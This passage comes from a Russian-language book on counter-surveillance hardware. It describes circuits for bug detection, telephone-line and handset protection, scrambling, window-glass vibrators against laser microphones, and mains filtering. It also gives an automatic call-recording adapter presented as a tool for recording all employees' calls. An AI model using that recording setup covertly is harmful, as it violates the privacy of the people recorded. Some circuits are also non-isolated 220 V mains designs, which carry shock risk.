В состав детектора поля входят ФВЧ, усилитель ВЧ, диодный детектор, усилитель постоянного тока с логарифмической зависимостью коэффициента усиления, звуковой генератор с изменяющейся частотой и светодиодная шкала из 12 светодиодов. Детектор способен регистрировать работающие радиомикрофоны в диапазоне частот 20-600 МГц. Принципиальная схема прибора приведена на рис. 3.5.
Сигнал, наводимый в антенне, фильтруется ФВЧ на элементах С2, L1, С3, L2 и поступает на широкополосный апериодический усилитель. Последний выполнен на высокочастотном транзисторе VT1 типа КТ3101. Нагрузкой усилителя служит эмиттерный повторитель на транзисторе VT2 типа КТЗ101. Сигнал, снимаемый с регулятора чувствительности - резистора R4, поступает через конденсатор С6 на диодный детектор, собранный на диоде VD1 типа Д9Б. Высокочастотные составляющие фильтруются RC-фильтрами R5, С7 и R6, С8. Низкочастотный сигнал поступает на усилитель на микросхеме DA1 типа КР140УД1208. Коэффициент усиления этого усилителя определяется значением резистора R9. При малом уровне входного сигнала усилитель на DA1 имеет большое усиление. По мере увеличения сигнала происходит открывание диода VD2 типа КД522, сопротивление которого изменяется по логарифмическому закону. Это приводит к изменению сопротивления обратной связи также по логарифмическому закону. С выхода усилителя на микросхеме DA1 сигнал поступает на светодиодный индикатор и звуковой генератор.
Звуковой генератор выполнен на транзисторе VT3 типа КТ315 и микросхеме DD1 типа К561ЛА7. Конденсатор С9 заряжается через резистор R11 до напряжения открывания транзистора VT3. Это приводит к смене уровня логической единицы на уровень логического нуля на коллекторе транзистора VT3. При этом катод диода VD3 типа КД522 оказывается подключенным через резистор R18 к минусу источника питания. Конденсатор С9 быстро разряжается через цепь VD3, К18, что ведет за собой закрывание транзистора VT3. Конденсатор С9 снова начинает заряжаться и весь процесс повторяется. Прямоугольные импульсы преобразуются пьезокерамическим преобразователем ZQ1 типа ЗП-22 в звуковые. При увеличении напряжения на выходе усилителя DA1 уменьшается время заряда конденсатора С9 до напряжения открывания транзистора VT3, а это, в свою очередь, приводит к увеличению частоты следования импульсов генератора. Таким образом, при увеличении уровня входного сигнала происходит повышение тональности звукового сигнала.
Основой светодиодного индикатора, является микросхема DA2 типа КМ1003ПП2. Микросхема КМ1003ПП2 является специализированной и выполняет функцию управления светодиодной шкалой, обеспечивая высвечивание столбика на шкале из 12 светодиодов, которые загораются поочередно при изменении входного напряжения от минимального до максимального значения. Яркость свечения светодиодов поддерживается постоянной. Входной сигнал, через делитель напряжения на резисторах R13, R16, поступает на вход микросхемы DA2 (вывод 17). На выводы 16 и 3 микросхемы DA2 подаются уровни опорного напряжения, определяющие, соответственно, минимальное (светодиоды не горят) и максимальное (горят все светодиоды) значения входного сигнала. Питается устройство от источника питания напряжением 5,6 В. Светодиод VD4 типа АЛЗО7 служит для индикации включения прибора.
Все используемые детали малогабаритные. Детали ФВЧ описаны выше. Микросхема DA1 может быть заменена на КР1407УД2 или любой другой операционный усилитель со своими цепями коррекции. Вместо микросхемы GD1 можно применить К561ЛЕ5. При замене диода VD1 на ГД507 диапазон прибора может быть увеличен до 900 МГц. Микросхема DA2 может быть заменена на A277D.
Работа с прибором аналогична вышеприведенному устройству. Чувствительность прибора регулируется резистором R4.
3.2. Защита телефонных аппаратов и линий связи
Одним из каналов утечки информации, и пожалуй, основным каналом, является телефонный аппарат и линия связи, соединяющая его с АТС.
Для любого специалиста, работающего в области промышленного шпионажа с применением технических средств контроля, представляют наибольший интерес так называемые "беззаходовые" системы, т. е. комплексы средств, позволяющие получать информацию из интересующих помещений без необходимости физического присутствия в них. Телефонный аппарат представляет в этом плане множество возможностей. Рассмотрим три случая решения задачи по получению необходимой информации:
Первый случай описан подробно в гл. 1. Ниже приводятся схемы защиты телефонных аппаратов и линий связи.
3.2.1. Защита телефонных аппаратов
Защита звонковой цепи
Причиной появления канала утечки информации являются электроакустические преобразования. При разговоре в помещении акустические колебания воздействуют на маятник звонка, соединенного с якорем электромагнитного реле. Под воздействием звуковых сигналов якорь совершает микроколебания, что, в свою очередь, вызывает колебания якорных пластин в электромагнитном поле катушек, следствием чего становится появление микротоков, промодулированных звуком. Амплитуда ЭДС, наводимой в линии, для некоторых типов телефонных аппаратов может достигать нескольких милливольт. Для приема используется низкочастотный усилитель с частотным диапазоном 300-3500 Гц, который подключается к абонентской линии.
Для защиты от такого канала утечки информации используется схема, представленная на рис. 3.6.
Два кремниевых диода VD1 и VD2 включены встречно-параллельно в цепь звонка телефонного аппарата В1. Они образуют зону нечувствительности для микро-ЭДС. Это объясняется тем, что в интервале 0-0,65 В диод обладает большим внутренним сопротивлением (вольтамперная характеристика диодов представлена на рис. 3.7).
Поэтому низкочастотные токи, наводимые в схеме аппарата, не пройдут в линию. В то же время звуковой сигнал абонента и напряжение вызова свободно "проходят" через диоды, так как их амплитуда превышает порог открывания диодов VD1, VD2. Резистор R1 является дополнительным шумящим элементом. Подобная схема, включенная последовательно в линию связи, подавляет микроЭДС катушки на 40-50 дБ.
Вместо указанных на схеме диодов можно использовать диоды Д226, КД105, КД102.
Защита микрофонной цепи
Этот вариант получения информации связан с явлением так называемого высокочастотного навязывания. При этом относительно общего корпуса на один провод подается высокочастотное колебание (частотой более 150 кГц). Через элементы схемы телефонного аппарата, даже если трубка не снята, высокочастотные колебания поступают на микрофон, где и модулируются звуковыми колебаниями. Прием информации производится относительно общего корпуса через второй провод линии. Амплитудный детектор позволяет выделить низкочастотную огибающую Для дальнейшего усиления и записи. Схема защиты телефонного аппарата от этого метода съема информации представлена на рис. 3.8.
Так как модулирующим элементом является микрофон М1 телефонного аппарата, то для его защиты достаточно подключить параллельно микрофону М1 конденсатор С1 емкостью 0,01-0,05 мкФ. При этом конденсатор С1 шунтирует по высокой частоте микрофонный капсюль М1. Глубина модуляции высокочастотных колебаний уменьшается более чем в 10000 раз, что делает практически невозможной дальнейшую демодуляцию.
Комплексная схема защиты
Эта схема представляет собой сочетание приведенных ранее двух схем. Кроме конденсаторов и резисторов схема, представленная на рис. 3.9, содержит катушки индуктивности.
Диоды VD1-VD4, включенные встречно-параллельно, защищают звонковую цепь телефона. Конденсаторы и катушки образуют фильтры С1, L1 и С2, L2 для подавления напряжений высокой частоты.
Детали монтируются в отдельном корпусе навесным монтажом. Устройство не нуждается в настройке. Однако оно не защищает пользователя от непосредственного подслушивания - путем прямого подключения в линию.
Кроме рассмотренной схемы существует и ряд других, которые по своим характеристикам близки к ранее описанным устройствам. Ниже приведены схемы (рис. 3.10), предназначенные для комплексной защиты телефонных аппаратов и линий связи и часто используемые в практической деятельности.
3.2.2. Защита линий связи
Световой анализатор телефонной линии
Данное устройство является простейшим индикатором наличия подслушивающих устройств. Оно устанавливается на предварительно проверенной телефонной линии. Питание осуществляется от телефонной линии. При наличии любых несанкционированных подключений различных устройств, питающихся от телефонной линии, выдается сигнал тревоги (включается красный светодиод). Схема такого устройства приведена на рис. 3.11.
Устройство состоит из анализатора линии, собранного на стабилитроне VD2 типа КС530 и транзисторе VT1 типа КТ503, и усилителя тока, собранного на транзисторах VT2 и VТЗ типа КТ503 и КТ502, соответственно. К выходу усилителя через ограничительный резистор R4 подключен светодиод VD3 типа АЛ307. Выпрямительный мост VD1 типа КЦ407 обеспечивает требуемую полярность питания устройства независимо от подключения его к телефонной сети.
При свободной линии постоянное напряжение в ней около 60 В. Стабилитрон VD2 "пробивается" (открывается), и в базу транзистора VT1 подается через ограничительный резистор R1 управляющий ток. Открытый и насыщенный транзистор VT1 шунтирует вход каскада на транзисторе VT2, поэтому усилитель тока закрыт и светодиод VD3 погашен.
При подключении в линию посторонних устройств напряжение в линии падает и ток, протекающий через стабилитрон VD2, уменьшается (вплоть до закрытия последнего).
Транзистор VT1 закрывается, а в базу транзистора VT2 через резистор R2 подается управляющий ток. Усилитель открывается и светодиод VD3 включается.
Индикатор линии на микросхеме
Индикатор устанавливается в корпус телефонного аппарата и питается от телефонной линии. Он индицирует несанкционированное подключение клинии в момент ведения разговора, т. е. когда трубка снята с рычага телефона. Принципиальная схема индикатора приведена на рис. 3.12.
Основу схемы составляет операционный усилитель DA1 типа КР1407УД2, включенный по схеме компаратора напряжений. При снятии телефонной трубки напряжение с линии подается на рассматриваемое устройство через диод VD4 типа КД522, образующий со стабилитроном VD5 типа КС156 параметрический стабилизатор напряжения. Одновременно напряжение поступает через резистор R1 на неинвертирующий вход компаратора DA1. На инвертирующий вход последнего подается опорное напряжение, снимаемое с движка подстроечного резистора R3. При снижении входного напряжения до уровня , меньшего чем опорное напряжение, на выходе компаратора DA1 появляется уровень логического нуля, что вызывает включение светодиода VD3 типа АЛ307.
Диоды VD1 и VD2 совместно с резистором R1 ограничивают напряжение на неинвертирующем входе DA1 на уровнях, выходящих за пределы питающих напряжений - не более, чем на 0,7 В (на величину прямого падения напряжения на диодах VD1, VD2). Конденсатор С1 защищает схему от высокочастотных наволок в линии. Резистор R5 устанавливает режим работы микросхемы DA1. В устройстве использованы резисторы типа МЛТ-О,125 . Диоды VD1, VD2, VD4 - любые кремниевые. Стабилитрон VD5 - любой на напряжение стабилизации 4,7-7,0 В. Микросхему DA1 можно заменить на КР140УД1208, а также на любой операционный усилитель с током потребления не более 5 мА.
Устройство настраивают по методике, приведенной ниже. Сняв трубку телефонного аппарата и установив разговорное соединение (позвонив, например, знакомым), подстройкой резистора R3 добиваются погашения светодиода VD3. Медленно, изменяя сопротивление резистора R3, находят положение движка последнего, при котором устройство срабатывает. Затем немного поворачивают движок резистора R3 в обратную сторону. Светодиод снова гаснет, прибор настроен. Он будет реагировать как на параллельное подключение к линии, так и на последовательное подключение. Необходимо соблюдать полярность включения прибора!
Активный индикатор состояния линии
В отличие от вышеприведенных устройств, данное устройство не только выявляет подключение дополнительной нагрузки, но и, при срабатывании системы сигнализации, переводит устройство в активный режим работы. Этот режим позволяет блокировать многие радиоретрансляционные устройства и приборы, предназначенные для автоматической записи телефонных переговоров. Принципиальная схема такого устройства представлена на рис. 3.13.
Устройство собрано на 4-х микросхемах и 4-х транзисторах. Работа прибора описана ниже. Исходное состояние: трубка телефонного аппарата опущена. Питание устройства осуществляется от телефонной линии через ограничительный резистор R5. Конденсатор С2 заряжается через резистор R5 до напряжения стабилизщации стабилитрона, выполненного на транзисторе VT2. С конденсатора С2 напряжение величиной 7-8 В поступает на устройство для питания микросхем (точка "а"). От источника питания через резистор R6 заряжаемся конденсатор СЗ. Резисторы R6, R7, конденсатор СЗ, светодиод VD3 и транзистор VT3 образуют схему индикации устройства. Напряжение линии через диод VD1 типа КД102 поступает на делитель напряжения, образованный резисторами R1 и R2. Напряжение на резисторе R2 ограничивается транзистором VT1, включенным по схеме стабилитрона, до напряжения питания, что необходимо для защиты входов микросхем от высокого напряжения. С движка подстроечного резистора R2 напряжение высокого уровня поступает на вход элемента DD1.1 микросхемы К561ЛЕ5, запрещая проход импульсов с генератора, выполнен нога на элементе 002.1 микросхемы К561ТЛ1. Этот генератор выполнен на основе триггера Шмидта. При заряде и разряде конденсатора С1 на выходе генератора появляются прямоугольные импульсы. Поскольку заряд конденсатора С1 происходит через диод VD2 типа КД522, а разряд - через резистор RЗ, то на выходе элемента DD2.1 имеют место короткие положительные импульсы с частотой следования 1-О,5 Гц. Первый же импульс, пройдя через дифференцирующую цепочка С4, R4 и элемент DD2.2, устанавливает триггер, собранный на элементах DD1.2, DD1.3, в положение, когда на входе элемента DD2.3 низкий уровень напряжения. Генератор, собранный на DD2.3, выключен и на выводах 1,8 микросхемы DА1 типа КР1014КТ1 присутствует высокий уровень. Одновременно импульсы с DD2.1 поступают на элементы DD1.1 и DD1.4. Через DD1.1 импульсы не проходят, т. к. c резистора R2 поступает высокий уровень. Нулевой уровень, снимаемый с резистора R9 подается на входы элементов DD3.1 и DD3.3 микросхемы К561ЛА7. Поэтому импульсы, проходящие через DD1.4, не проходят на DD3.4. Следовательно, на выходе DD2.4 присутствует логический ноль, и транзистор VT3 закрыт. С движка резистора R2 снимается напряжение логической единицы, достаточное для переключения элемента DD1.1, выполняющего функцию управляемого компаратора с чувствительностью в десятки милливольт.
Если к линии подключается дополнительная нагрузка сопротивлением менее 100 кОм, то напряжение в линии уменьшится на некоторую величину. Одновременно уменьшается и напряжение на движке резистора R2. Это приводит к появлению на входе DD1.1 напряжения, воспринимаемого микросхемой как уровень логического нуля. Этот уровень разрешает прохождение импульсов от DD2.1 через DD1.1. Поскольку на выходе DD3.1 высокой уровень, то импульсы проходят через ключ DD3.2. При этом на выходе DD3.3 тоже высокий уровень и эти импульсы проходят и через ключ DD3.4. Продифференцированные цепочкой С6, R12 импульсы через элемент DD2.4 поступают на базу транзистора VT3. Транзистор открывается, и конденсатор С3 быстро разряжается через открытый транзистор VT3 и светодиод VD3, который ярко вспыхивает с частотой 0,5-1 Гц. В перерывах между импульсами конденсатор С3 подзаряжается через резистор R6. Так как оценка состояния линии происходит под управлением импульсов с генератора DD2.1, то некоторое изменение напряжения в линии в момент заряда конденсатора С3 на работе устройства не сказывается.
Рассмотрим случай, когда телефонная трубка снята. При этом со противление телефонного аппарата включается между плюсовым проводом линии и резисторами R11 и R13. Напряжение в линии уменьшается до 5-25 В, т. к, нагрузкой линии будут телефонный аппарат, резистор R13 и резистор R14, зашунтированный малым (около 10 Ом) сопротивлением микросхемы DA1. Напряжение, снимаемое с резистора R13, обеспечивает питание устройства через диод VD4 типа КД522. При этом напряжение высокого уровня с точки соединения резисторов R8,R9 поступает на элементы DD3.3 и DD3.1. Низким уровнем закрывается ключ DD3.2. С движка резистора R9 снимается напряжение логической единицы, близкое к напряжению переключения компаратора DD1.4. Допустим, что к линии подключается (или была подключена) дополнительная параллельная или последовательная нагрузка, которая приводит к уменьшению напряжения в линии. При этом напряжение на движке резистора R9 принимает уровень, расцениваемый микросхемой, как уровень логического нуля. При этом импульсы с DD2.1 проходят через DD1.4, DD3.3 и DD3.4. После дифференцирующей цепочки С6, R12 и элемента DD2.4 они поступают на базу транзистора VT3, включая световую индикацию. Одновременно, первый же импульс переводит триггер на DD1.2 и DD1.3 в состояние, разрешающее работу генератора на элементе DD2.3. С выхода генератора короткие импульсы частотой 12-20 кГц поступают на ключ, выполненный на микросхеме DА1. Ключ начинает закрываться и открываться с частотой генератора. При этом сигнал в линии модулируется этой частотой. Это вызывает расширение спектра сигнала, излучаемого радиоретранслятором, подключенным в линию. Одновременно напряжение влипни увеличивается до 35-45 В. Это связано с тем, что последовательно с резистором R13 включается резистор R14, ранее шунтированный ключом DА1. Повышение напряжения в линии до такого уровня позволяет нейтрализовать автоматические записывающие устройства, срабатмвающие по уровню напряжения в линии.
Для того, чтобы работа этого генератора не мешала анализу состояния линии, он периодически отключается путем переключения триггера DD1.2, DD1.3 на момент оценки состояния линии. Если в процессе оценки состояния линии принимается решение о том, что линия свободна от посторонних подключений, то схема автоматически устанавливается в исходное состояние и переходит в ждущий режим с периодической проверкой состояния линии.
Резисторы используются типа МЛТ-0,125. Диод VD1 можно заменить на КД105, Д226. Транзисторы можно заменить на КТ3102, КТ503. Микросхемы можно использовать из серий 564 и 1561. Конденсаторы С1, С2 и С3 должны быть с минимальным током утечки.
При настройке устройства устанавливается частота генераторов 0,51 Гц и 12-20 кГц резисторами R3 и R10, соответственно. При включенном генераторе DD2.3 резистором R14 устанавливается уровень напряжения в линии, равный 35-45 В, при котором еще не происходит рассоединение линии. Исходные уровни срабатывания рассматриваемого устройства устанавливаются резисторами R2 и R9.
Прибор необходимо подключать к линии с соблюдением полярности
Блокиратор параллельного телефона
Во многих офисах и квартирах телефонные аппараты подключяют параллельно к одной линии. Поэтому разговор между двумя абонентами легко может прослушать и третий. Чтобы исключить такую возможность, используют устройство, обычно именуемое блокиратором. Схема блокиратора приведена на рис. 3.14.
Принцип действия схемы, представленной на рис. 3.14, предельно прост. Допустим, что снята трубка с телефонного аппарата ТА2. В цепи задействованного аппарата ТА2 напряжение линии 60 В пробивает динистор VS2 типа К1-1102А н оно падает до 5-15 В. Этого напряжения недостаточно для пробоя линисторов VS1, VS3 или VS4 в цепях параллельных аппаратов. Последние оказываются практически отключенными от линии очень большим сопротивлением закрытых динисторов. Это будет продолжаться до тех пор, пока первый из снявших трубку (в нашем случае ТА2) не положит ее на рычаги. Эта же схема позволит избавиться и от такого недостатка, связанного с параллельным включением аппаратов, как "подзванивание" их при наборе номера.
Устройство не нуждается в настройке. При подключении необходимо соблюдать полярность напряжения питания.
Аналогичное по принципу действия устройство можно собрать на другой элементной базе по схеме, приведенной на рис. 3.15.
Устройство содержит два аналога динисторов. Диоды и тиристоры могут быть любыми с допустимым напряжением не менее 100 В и рассчитанными на ток до 0,1 А. Стабилитроны VD1 и VD3 могут быть на напряжение стабилизации от 5,6 до 20 В.
3.2.3. Криптографические методы и средства защиты
Кардинальной мерой предотвращения прослушивания телефонных разговоров является использование криптографических методов защиты информации. В настоящее время для защиты телефонных сообщений применяют два метода: преобразование аналоговых параметров речи и цифровое шифрование. Устройства, использующие эти методы, называются скремблерами.
При аналоговом скремблировании производится изменение характеристики исходного звукового сигнала таким образом, что результирующий сигнал становится неразборчивым, но занимает ту же частотную полосу. Это дает возможность без проблем передавать его по обычным телефонным каналам связи. При этом методе сигнал может подвергаться следующим преобразованиям:
При цифровом способе закрытия передаваемого сообщения непрерывный аналоговый сигнал предварительно преобразуется в цифровой вид. После чего шифрование сигнала происходит обычно с помощью сложной аппаратуры, зачастую с применением компьютеров.
Ниже приводится описание скремблера, использующего метод частотной инверсии. Этот метод давно и успешно применяется американскими полицейскими службами и обеспечивает эффективную защиту радио- и телефонных переговоров от постороннего прослушивания.
Частотно-инвертированный сигнал выделяется из нижней боковой полосы спектра балансного-преобразования звукового сигнала с над звуковой несущей. Две последовательные инверсии восстанавливают исходный сигнал. Устройство работает как кодер и декодер одновременно. Синхронизации двух скремблеров не требуется. Принципиальная схема такого скремблера приведена на рис. 3.16.
Это устройство состоит из тактового генератора на микросхеме DD2 типа К561ЛА7, вырабатывающего сигнал частотой 7 кГц, делителя-формирователя несущей 3,5 кГц на микросхеме DD3.1 типа К561ТМ2, аналогового коммутатора балансного модулятора на микросхеме DD4 типа K561KT3, входного полосового фильтра с полосой пропускания 300-3000 Гц на микросхеме DА1.1 типа К574УД2 и сумматора балансного модулятора с фильтром низкой частоты на микросхеме DА1.2. Подстройка частоты тактовых импульсов, а следовательно частоты несущей, производится многооборотным резистором R3.
На рис. 3.17 представлены спектры входного (а) и преобразованного (б) сигналов.
В пределах полосы частот 300-3000 Гц разборчивость речи после двух преобразований составляет не менее 65%.
3.3. Защита информации от утечки по оптическому каналу
Для скрытности проведения перехвата речевых сообщений из помещений могут быть использованы устройства, в которых передача информации осуществляется в оптическом диапазоне. Чаще всего используется невидимый для простого глаза инфракрасный диапазон излучения.
Наиболее сложными и дорогостоящими средствами дистанционного перехвата речи из помещений являются лазерные устройства. Принцип их действия заключается в посылке зондирующего луча в направлении источника звука и приеме этого луча после отражения от каких-либо предметов, например, оконных стекол, зеркал и т. д. Эти предметы вибрируют под действием окружающих звуков и модулируют своими колебаниями лазерный луч. Приняв отраженный от них луч, можно восстановить модулирующие колебания.
Исходя из этого, рассмотрим один из достаточно простых, но очень эффективных способов защиты от лазерных устройств. Он заключается в том, чтобы с помощью специальных устройств сделать амплитуду вибрации стекла много большей, чем вызванную голосом человека. При этом на приемной стороне возникают трудности в детектированип речевого сигнала. Ниже приведены схемы и описания некоторых подобных устройств.
Простейший модулятор оконного стекла
Этот модулятор прост в изготовлении, содержит минимальное количество деталей и не требует налаживания. Он позволяет передавать стеклу колебания частотой 50 Гц. И в этом заключается его недостаток, так как с помощью современных средств обработки сигналов возможно вырезать эту частоту из спектра речевого сигнала. Принципиальная схема устройства приведена на рис. 3.18
В качестве модулятора с частотой 50 Гц используется обычное малогабаритное реле постоянного тока Р1. Питается реле Р1 от сети переменного тока частотой 50 Гц и напряжением 220 В через понижающий трансформатор Т1. На выводы обмотки реле Р1 подается напряжение со вторичной обмотки трансформатора Т1, немного ниже порога срабатывания. В качестве трансформатора используется любой, желательно малогабаритный, понижающий трансформатор. Напряжение на обмотке II выбирается в зависимости от используемого реле. Реле Р1 может быть типа РЭС22, РЭС9 и им подобные. Корпус реле приклеивается к стеклу клеем "Момент" или аналогичным (рис. 3.19).
Если подходящего трансформатора подобрать не удалось, то можно воспользоваться бестрансформаторной схемой устройства приведенной на рис. 3.20.
Конденсатор С1 гасит излишек напряжения, он подбирается под определенную нагрузку. Его можно разместить прямо в штепсельной вилке. При монтаже необходимо помнить, что устройство не имеет гальванической развязки с питающей сетью.
Другой модулятор позволяет получать сигналы, которые имеют хаотический характер, т. к, частота следования импульсов не стабильна. Устройство представляет собой два генератора импульсов, частоты которых не стабилизированы и отличаются друг от друга. Оба генератора работают на общую нагрузку. Принципиальная схема модулятора приведена на рис. 3.21.
Питание устройства осуществляется от сети переменного тока напряжением 220 В. Напряжение питания снимается с делителя напряжения на резисторах R1-R3 и выпрямляется диодом VD1 типа КД102А. Выпрямленное напряжение сглаживается конденсатором С1. Так как конденсатор С1 имеет небольшую емкость, то напряжение питания имеет большие пульсации. Оба генератора импульсов собраны на транзисторной сборке VT1 типа К101КТ1Г, содержащей два идентичных транзистора VT1.1 и VT1.2. Микросборка представляет собой транзисторные прерыватели для коммутации слабых сигналов переменного и постоянного токов. Транзисторы микросборки имеют общий коллектор. Работают генераторы следующим образом. Через резисторы R5 и R6 происходит заряд конденсаторов С2 и С3, соответственно, от источника питания. При достижении на конденсаторах С2 и С3 напряжения пробоя транзисторов VT1.1 и VT1.2 последние открываются и происходит разряд конденсаторов через базовый переход транзистора VT2 типа КТЗО1. Это приводит к открыванию транзистора VT2 и короткие импульсы (щелчки, следующие с частотой в сотни герц) поступают на пьезокерамические излучатели ZQ1 и ZQ2. Период времени между импульсами постоянно изменяется, в связи с чем считывание информации со стекол в условиях апериодических акустических полей даже с использованием специальных фильтров сильно затруднено. Громкость звукового сигнала можно плавно регулировать резистором R4.
Транзистор VT2 можно заменить на КТ3102, КТ315. Пьезокерамические преобразователи могут быть любыми, их число может быть от одного до четырех. Диод VD1 можно заменить на КД105. Пьезоизлучатели наклеиваются в центре стекла внутренних рам и соединяются с генератором тонким проводом.
Модулятор на одной микросхеме
Этот модулятор тоже питается от сети переменного тока напряжением 220 В. Принципиальная схема модулятора приведена на рис. 3.22.
Напряжение сети гасится резисторами R1 и R2 и выпрямляется диодом VD1 типа КД102А. Конденсатор С1 уменьшает пульсации выпрямленного напряжения. Модулятор выполнен на одной микросхеме К561ЛЕ5. По своему схемному пострению он напоминает генератор качающей частоты или частотный модулятор. На элементах DD1.3 и DD1.4 собран управляющий генератор низкой частоты. С его выхода прямоугольные импульсы поступают на интегрирующую цепочку R5, С4. При этом конденсатор С4 то заряжается через резистор R5, те разряжается через него. Поэтому на конденсаторе С4 получается напряжение треугольной формы, которое используется для управления генератором на элементах DD1.1, DD1.2. Этот генератор собран по схеме симметричного мультивибратора. Конденсаторы С2 и С3 поочередно заряжаются через резисторы R3 и R4 от источника треугольно то напряжения. Поэтому на выходе генератора будет иметь место сигнал, частота которого "плавает" в области звуковых частот речевого диапазона. Поскольку питание генератора не стабилизировано, то это приводит к усложнению характера генерируемых сигналов. Нагрузкой генератора служат пьезокерамические излучатели ZQ1 и ZQ2 типа ЗП-1.
Микросхему DD1 можно заменить на К561ЛА7 и даже на К561ЛН1 , К561ЛН2, либо на микросхемы серий 564, 1561.
Излучатели ZQ1 и ZQ2 могут быть любыми, их, количество может быть от одного до четырех. Они могут быть соединены последовательно или параллельно-последовательно.
Устройство модуляции стекла на цифровых микросхемах
Данное устройство вызывает вибрацию стекла с различной частотой, тем самым устраняя основной недостаток простейшего модулятора. Оно выполнено на двух цифровых схемах 561 серии. В качестве вибропреобразователя используется пьезокерамический преобразователь. Принципиальная схема устройства приведена на рис. 3.23.
Модулятор собран на микросхемах К561ЛН2 и К561ИЕ8. Генератор тактовых импульсов собран на элементах DD1.1, DD1.2, резисторе R1 и конденсаторе С1 по схеме несимметричного мультивибратора. С выхода генератора тактовые импульсы поступают на вход счетчика DD2 типа К561ИЕ8. Эта микросхема имеет встроенный дешифратор, поэтому напряжение высокого уровня поочередно появляется на выходах счетчика в соответствии с количеством пришедших импульсов. Допустим, что после прихода очередного тактового импульса уровень логической единицы появился на выходе 2 микросхемы DD2 (выв. 4). На остальных выходах присутствует уровень логического нуля. Положительное напряжение начинает заряжать конденсатор С2 по цепи VD3, R4, R12. При достижении на конденсаторе С2 напряжения, достаточного для открывания транзистора VT1 типа КТЗ15, последний открывается, и на выходе элемента DD1.4 появляется уровень логического нуля. Конденсатор С2 быстро разряжается через диод VD11 типа КД522. Транзистор VT1 закрывается, и процесс заряда конденсатора С2 возобновляется по той же зарядной цепи. С приходом очередного тактового импульса уровень пол.ожительного напряжения появляется только на выходе 3 (выв. 7). Теперь конденсатор С2 заряжается по цепи VD4, К5, R12. Так как суммарное сопротивление этой цепи меньше, чем сопротивление цепи VD3, R4, R12, то заряд конденсатора С2 до напряжения открывания происходит быстрее. Частота импульсов на выходе этого управляемого генератора увеличивается. Прямоугольные импульсы поступают на вибронреобразователь ZQ1, выполненный на основе пьезокерамического преобразователя .
Микросхемы DD1 и DD2 можно заменить на аналогичные - серий 176, 564, 1561. Резисторы - типа МЛТ-0,125. Сопротивления резисторов R2-R11 могут быть любыми из интервала 10 ком - 1 МОм. Резисторы одинакового номинала лучше не использовать. Диоды VD1-VD11 могут быть любыми, например, КД521, Д9, Д18, КД510 и др. Транзистор VT1 можно заменить на КТ3102. Пьезокерамический преобразователь ZQ1 может быть любой, от игрушек или телефонных аппаратов. Питание устройства осуществляется от батарейки типа "Крона". Вибродатчик ZQ1 приклеивается на стекло клеем "Момент". Сигнал к нему подводится по проводам от элемента DD1.6.
Настройка заключается в установке частоты тактового генератора подбором конденсатора С1 или резистора R1. Частота тактовых импульсов выбирается около 2-3 Гц.
Количество генерируемых частот можно увеличить, если вместо микросхемы DD2 К561ИЕ8 использовать широко распространенную микросхему К561ИЕ10. Эта микросхема (рис. 3.24) содержит два двоичных четырехразрядных счетчика.
К выходам счетчиков подключаются резисторы R2-R9, их сопротивления могут быть также от 10 кОм до 1 МОм. Диоды VD1-VD10 из схемы исключаются. При подаче тактовых импульсов на вход СР микросхемы DD2.1 в точке соединения резисторов R2-R12 появляется, изменяющееся ступенчато, напряжение. Число градаций напряжения, а, следовательно, и число частот, можно варьировать путем использования определенного количества разрядов счетчика DD2.
3.4. Специальные устройства защиты информации
Кроме вышеописанных устройств в системах защиты информации используются и многие другие устройства и приборы. К ним относятся такие устройства, как сетевые фильтры, исключающие возможность утечки информации по цепям источников питания; приборы, обеспечивающие автоматическую запись телефонных разговоров; акустические генераторы шума, маскирующие звуковой сигнал и многие другие, используемые, как правило, специалистами в этой области.
3.4.1. Защита питающих цепей радиоэлектронной аппаратуры
Сетевой фильтр
Сетевые фильтры обеспечивают защищенность электронного устройства не только от внешних помех, но и от разного рода сигналов, генерируемых устройствами, которые могут служить источником утечки информации.
К числу защищаемых устройств относят самую разнообразную аппаратуру: компьютеры, приемники диапазона длинных и средних волн, радиотрансляционные приемники и др. Сетевой фильтр включают между энергетической сетью и устройством потребителя.
На рис. 3.25 представлена принципиальная схема сетевого фильтра, рассчитанного на мощность нагрузки 100 Вт.
Он обеспечивает питание одновременно двух потребителей.
В данном фильтре использованы два способа подавления помех: фильтрация режекторным дросселем Др1, Др2 и экранирование сетевой обмотки трансформатора Т1 и выходной обмотки трансформатора Т2. Электростатическим экраном сетевой обмотки трансформатора Т1 и выходной обмотки трансформатора Т2 служат магнитопроводы и низковольтные обмотки трансформаторов, расположенные поверх высоковольтных и соединенные с общим проводом фильтрам устройств-потребителей. Так как направление намотки обмоток и индуктивность дросселей Др1 и Др2 одинаковы, а токи через обмотки Др1 и Др2 противофазны, то сумма магнитных полей этих обмоток равна нулю и результирующее сопротивление дросселей переменному току промышленной частоты равно активному сопротивлению обмоток. Следовательно, падение напряжение на дросселях Др1, Др2 практически равно нулю.
В устройстве использованы два готовых трансформатора Т1 и Т2 типа ТПП296-127/220-50. Режекторный дроссель Др1, Др2 выполнен на ферритовом кольцевом магнитопроводе марки М4000 размером К65х32х8. Две обмотки наматываются в два провода, одновременно, проводом МГШВ-0,5 и содержат по 20 витков каждая. Намотка должна быть в один слой. Марка феррита и размер сердечника могут быть другими, но индуктивность дросселей должна быть около 1,5 мГн. Конденсаторы С1 и С2 должны быть рассчитаны на напряжение более 400 В.
3.4.2. Устройство для автоматической записи телефонных разговоров
Телефонный адаптер
Для анализа утечки информации по открытым каналам телефонной связи необходимо иметь записи телефонных разговоров всех сотрудников фирмы. Прослушивание записей позволяет установить характер и источник утечки информации и сделать соответствующие выводы.
Для записи телефонных разговоров используются устройства, автоматически подключающие записывающие устройства при снятии трубки телефонного аппарата. Принципиальная схема такого телефонного адаптера представлена на рис. 3.26.
Когда телефонная трубка не поднята, в телефонной линии присутствует напряжение около 60 В. Через делитель, собранный на резисторах R1-R3, оно поступает на затвор полевого транзистора VT1 типа КП10ЗМ и запирает его. Это приводит к закрытию транзистора VT2 типа КТЗ15 и транзистора VT3 типа КТ814. Реле К1 типа РЭС22 обесточено и его контакты К1.1-К1.4 разомкнуты.
При поднятии телефонной трубки в линии устанавливается напряжение 5-15 В, что ведет к открыванию транзистора VT1 и, следовательно, транзисторов VT2 и VT3. Срабатывает реле К1, которое контактами К1.3 и К1.4 подает питание 220 В на магнитофон, предварительно включенный на запись, и одновременно контактами K1.1 и К1.2 подключает телефонную линию через конденсаторы С1 и С2 ко входу магнитофона. Начинается запись разговора на магнитофон. Запись прекращается после опускания телефонной трубки на рычаг телефонного аппарата. Конденсатор СЗ сглаживает пульсации и шумы, наводимые в линии, которые могут вызвать ложные срабатывания устройства.
